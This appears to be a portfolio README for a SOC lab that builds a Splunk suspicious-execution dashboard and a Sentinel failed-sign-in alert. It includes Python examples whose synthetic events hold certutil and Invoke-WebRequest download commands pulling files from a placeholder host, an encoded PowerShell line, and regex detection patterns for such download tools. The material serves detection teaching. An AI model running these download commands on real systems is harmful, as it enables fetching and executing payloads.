Watch the video <-- WATCH ME BUILD IT!
This lab demonstrates a practical SOC workflow using Splunk and Microsoft Sentinel.
In Splunk, synthetic process activity (like PowerShell commands and malware-style downloads) is generated and visualized on a KPI dashboard.
In Microsoft Sentinel, a scheduled analytic alert is created to detect spikes in failed sign-ins, simulating a common brute-force scenario.
This project highlights end-to-end SIEM ingestion, detection, and alerting, showcasing hands-on log analysis, KQL, dashboards, and automated alert rules.
- SIEM: Microsoft Sentinel, Splunk
- Cloud: Azure Portal & Log Analytics
- Security & Detection: KQL, automated analytic alerts
- Operating Systems: Windows 11
Splunk Synthetic Event Generation
- Simulate suspicious process activity (encoded PowerShell, malware-style downloads).
- Filter and aggregate events using SPL queries.
- Visualize total detections as a KPI panel on a dashboard.
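The filter-and-aggregate step above, reproduced as an added example that is not part of the lab's own materials: a few constructed process-creation events in a Sysmon-style shape (the field names `host`, `Image` and `CommandLine` are an assumption, as is the SPL sketched in the comment), the two detections the lab names (encoded PowerShell and download-style commands), and the aggregation that yields the KPI count plus the per-host breakdown a panel would show.

```python
"""Added example: synthetic process events, the filter logic behind a
'Suspicious Execution Overview' KPI, and a decode helper for triage.
Field names and the SPL in the comment are assumptions, not the lab's code."""
import base64
import re
from collections import Counter


def _enc(cmd: str) -> str:
    """Build the base64 form PowerShell's -EncodedCommand expects (UTF-16LE)."""
    return base64.b64encode(cmd.encode("utf-16-le")).decode()


# Constructed sample events: benign launches mixed with the two suspicious kinds.
SAMPLE_EVENTS = [
    {"host": "WS01", "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe"},
    {"host": "WS01", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoProfile -EncodedCommand " + _enc("Write-Host test")},
    {"host": "WS02", "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "certutil.exe -urlcache -split -f http://example.invalid/payload.exe payload.exe"},
    {"host": "WS02", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe Invoke-WebRequest http://example.invalid/a.ps1 -OutFile a.ps1"},
    {"host": "WS03", "Image": r"C:\Windows\explorer.exe",
     "CommandLine": "explorer.exe"},
]

# Roughly what an SPL search would do (assumed sketch, not the lab's query):
#   index=lab sourcetype=process
#   | regex CommandLine="(?i)-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}|invoke-webrequest|certutil.*-urlcache"
#   | stats count
ENCODED_PS = re.compile(r"(?i)\s-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})")
DOWNLOAD_CRADLE = re.compile(
    r"(?i)(invoke-webrequest|\biwr\b|downloadstring|downloadfile|"
    r"certutil(?:\.exe)?\s+-urlcache|bitsadmin(?:\.exe)?\s+/transfer)"
)


def classify(event):
    """Return a detection tag for a suspicious event, or None when it is benign."""
    cmd = event["CommandLine"]
    image = event["Image"].lower()
    if image.endswith("powershell.exe") and ENCODED_PS.search(cmd):
        return "encoded_powershell"
    if DOWNLOAD_CRADLE.search(cmd):
        return "download_cradle"
    return None


def decode_encoded_command(cmd):
    """Recover the plaintext of an -EncodedCommand argument for analyst review."""
    match = ENCODED_PS.search(cmd)
    if not match:
        return None
    return base64.b64decode(match.group(1)).decode("utf-16-le")


def suspicious_execution_overview(events):
    """Aggregate like `| stats count by tag, host`; 'total' is the KPI value."""
    by_tag, by_host = Counter(), Counter()
    for event in events:
        tag = classify(event)
        if tag:
            by_tag[tag] += 1
            by_host[event["host"]] += 1
    return {"total": sum(by_tag.values()), "by_tag": dict(by_tag), "by_host": dict(by_host)}


if __name__ == "__main__":
    print(suspicious_execution_overview(SAMPLE_EVENTS))
    print(decode_encoded_command(SAMPLE_EVENTS[1]["CommandLine"]))
```

The regex is deliberately narrow (a long base64 run after the encoded flag, a handful of well-known download utilities) so the KPI measures what the panel title claims; widening it without checking the false-positive rate against normal admin activity is the usual way such a panel becomes noise.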
Dashboard Setup in Splunk
- Create a dashboard panel titled "Suspicious Execution Overview".
- Pin panel to a SOC-style dashboard for ongoing monitoring.
Microsoft Sentinel Analytic Rule
- Query authentication logs for failed sign-ins using KQL.
- Create a scheduled analytic rule (runs every 10 minutes) to trigger alerts for excessive failed login attempts.
- Verify alert rule activation and ensure automated detection works as intended.
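The scheduled rule described in the three steps above, as an added example that is not the lab's own KQL or rule definition: constructed sign-in records in the shape of the Sentinel `SigninLogs` table (`TimeGenerated`, `UserPrincipalName`, `IPAddress`, `ResultType`, where `"0"` is success), a rule that runs every 10 minutes over a 10-minute lookback, and a scheduler loop that shows which runs fire. The threshold of 5 and the KQL in the comment are assumptions.

```python
"""Added example: a scheduled 'excessive failed sign-ins' rule evaluated the
way Sentinel's scheduler would (frequency, lookback, threshold).
Sample records are constructed; the threshold and the KQL are assumptions."""
from collections import defaultdict
from datetime import datetime, timedelta, timezone


def ts(hour, minute, second=0):
    """Constructed timestamps on a fixed day, in UTC like TimeGenerated."""
    return datetime(2024, 1, 1, hour, minute, second, tzinfo=timezone.utc)


# Constructed sign-in records. 50126 is the Entra ID result code for a bad
# username or password; "0" is a successful sign-in.
SAMPLE_SIGNINS = (
    # one old failure, outside the window of the 10:10 run
    [{"TimeGenerated": ts(9, 50), "UserPrincipalName": "alice@contoso.example",
      "IPAddress": "203.0.113.7", "ResultType": "50126"}]
    # eight failures in six minutes from one source against one account
    + [{"TimeGenerated": ts(10, 2) + timedelta(seconds=45 * i),
        "UserPrincipalName": "alice@contoso.example",
        "IPAddress": "203.0.113.7", "ResultType": "50126"} for i in range(8)]
    # a single typo followed by a successful sign-in: normal user behaviour
    + [{"TimeGenerated": ts(10, 4), "UserPrincipalName": "bob@contoso.example",
        "IPAddress": "198.51.100.4", "ResultType": "50126"},
       {"TimeGenerated": ts(10, 5), "UserPrincipalName": "bob@contoso.example",
        "IPAddress": "198.51.100.4", "ResultType": "0"}]
)

# Equivalent query shape (assumed, not the lab's own):
#   SigninLogs
#   | where TimeGenerated > ago(10m) and ResultType != "0"
#   | summarize FailedCount = count() by IPAddress, UserPrincipalName
#   | where FailedCount >= 5
RULE = {
    "name": "Excessive failed sign-ins",
    "frequency": timedelta(minutes=10),  # how often the rule runs
    "lookback": timedelta(minutes=10),   # span of data each run examines
    "threshold": 5,                      # failures per (IP, user) pair to alert
}


def evaluate_rule(signins, run_time, rule=RULE):
    """One scheduled run: count failures per (IP, user) inside the lookback window."""
    start = run_time - rule["lookback"]
    counts = defaultdict(int)
    for record in signins:
        if not (start <= record["TimeGenerated"] < run_time):
            continue
        if record["ResultType"] == "0":
            continue
        counts[(record["IPAddress"], record["UserPrincipalName"])] += 1
    return [
        {"rule": rule["name"], "run_time": run_time, "IPAddress": ip,
         "UserPrincipalName": upn, "FailedCount": n}
        for (ip, upn), n in sorted(counts.items())
        if n >= rule["threshold"]
    ]


def run_schedule(signins, first_run, runs, rule=RULE):
    """Simulate the scheduler: evaluate the rule at each interval and collect alerts."""
    alerts = []
    for k in range(runs):
        alerts.extend(evaluate_rule(signins, first_run + k * rule["frequency"], rule))
    return alerts


if __name__ == "__main__":
    for alert in run_schedule(SAMPLE_SIGNINS, ts(10, 0), 3):
        print(alert)
```

With frequency equal to lookback the windows tile without overlap, so a record that lands in the workspace after its window has been evaluated is never counted; when verifying that the rule fires as intended, check ingestion delay and consider a lookback slightly longer than the frequency (accepting the resulting duplicate counts) if that gap matters.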
- Log analysis and detection in Splunk
- KQL query writing and log analytics in Microsoft Sentinel
- Scheduled alert creation and SOC-style workflow implementation
- Dashboard visualization for real-time monitoring